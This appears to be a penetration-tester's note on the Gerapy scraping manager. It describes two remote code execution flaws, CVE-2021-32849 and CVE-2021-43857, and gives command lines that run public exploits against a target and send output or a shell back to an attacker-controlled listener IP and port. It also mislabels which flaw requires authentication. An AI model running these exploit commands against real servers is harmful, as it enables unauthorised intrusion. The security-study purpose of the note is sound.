Gerapy

Gerapy is a web-based management tool designed for deploying, scheduling, and controlling web scraping projects built with Scrapy. It provides a graphical interface that simplifies interaction with Scrapy spiders across multiple servers, removing the need to manually execute or configure them via the command line. Gerapy enables centralized management of multiple scraping jobs, integrates scheduling functionality, and supports deployment to distributed environments.

Unauthenticated RCE

Gerapy versions prior to 0.9.9 are vulnerable to unauthenticated RCE (CVE-2021-32849). This is due to improper input handling in the project deployment functionality. Specifically, the issue lies in how Gerapy processes uploaded project files. It fails to sanitize or validate the contents of these uploads, allowing an attacker to include malicious Python code within a project archive. When this archive is extracted and executed by the application, the embedded payload runs with the privileges of the Gerapy process. A PoC is available:

python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id

The response including the commands output will be received on the listener.

Authenticated RCE

Gerapy versions prior to 0.9.8 (CVE-2021-43857) are vulnerable to authenticated RCE due to the lack of authentication or access control on critical API endpoints. In vulnerable versions, attackers can directly interact with exposed endpoints that allow project deployment, spider execution, or command injection without requiring valid credentials. This flaw permits unauthenticated users to execute arbitrary system commands on the server hosting Gerapy, effectively resulting in RCE. A PoC is available, but we need first to create a project and then execute it.

$ searchsploit Gerapy
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) | python/remote/50640.py

$ python2 50640.py -t 192.168.161.24 -p 8000 -L 192.168.45.170 -P 80